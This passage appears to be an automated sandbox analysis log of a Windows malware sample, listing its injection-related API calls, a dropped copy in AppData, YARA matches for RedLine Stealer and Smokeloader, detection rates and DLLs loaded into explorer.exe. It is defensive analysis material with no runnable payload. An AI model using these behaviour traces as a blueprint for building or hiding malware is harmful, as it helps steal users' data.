Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\tttcvva	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964

Source: 3sfCdeA1H2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1792278239.0000000002CDC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1792409837.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2055394141.0000000004780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2055364518.0000000004770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1792124239.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2055477127.00000000047B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1792142730.0000000002CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.2055184698.0000000002C5D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: 3sfCdeA1H2.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: tttcvva.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/9@4/1

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

Code function: 0_2_02CDFA88 CreateToolhelp32Snapshot,Module32First,

0_2_02CDFA88

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\tttcvva

Jump to behavior

Source: C:\Windows\System32\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\a0e0b845-927d-4c94-8d32-fda738e17b8c

Jump to behavior

Source: unknown

Process created: C:\Windows\explorer.exe

Source: 3sfCdeA1H2.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 3sfCdeA1H2.exe	ReversingLabs: Detection: 42%
Source: 3sfCdeA1H2.exe	Virustotal: Detection: 38%

Source: unknown	Process created: C:\Users\user\Desktop\3sfCdeA1H2.exe "C:\Users\user\Desktop\3sfCdeA1H2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\tttcvva C:\Users\user\AppData\Roaming\tttcvva
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2580 -s 4964
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3sfCdeA1H2.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tttcvva	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.applicationmodel.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: appextension.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositoryclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sndvolsso.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cldapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fltlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: tiledatarepository.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: staterepository.core.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepository.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.pcshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wincorlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.immersiveshell.serviceprovider.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: languageoverlayutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: applicationframe.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: photometadatahandler.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ehstorshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: holographicextensions.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: virtualmonitormanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.immersive.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: abovelockapphost.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: npsm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.bluelightreduction.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.signals.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.staterepositorybroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actxprxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: structuredquery.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.data.activities.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.security.authentication.web.core.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.system.launcher.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.ui.shell.windowtabmanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: notificationcontrollerps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.devices.enumeration.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.globalization.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: icu.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswb7.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: devdispitemprovider.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.networking.connectivity.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.core.textinput.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windowsudk.shellcommon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dictationmanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uianimation.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pcshellcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptngc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cflapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shellcommoncommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: daxexec.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: container.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: stobject.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: batmeter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: inputswitch.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.ui.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: prnfldr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: syncreg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: actioncenter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: pnidui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscinterop.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wscapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: networkuxbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ethernetmediamanager.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: storageusage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dusmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: werconcpl.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: hcproviders.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ncsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: fhcfg.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: efsutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpdshserviceobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.system.userprofile.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: portabledevicetypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cloudexperiencehostbroker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: portabledeviceapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wdscore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cscobj.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srchadmin.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.search.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: synccenter.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: imapi2.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: bluetoothapis.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: settingsync.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: settingsynccore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msxml6.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\3sfCdeA1H2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

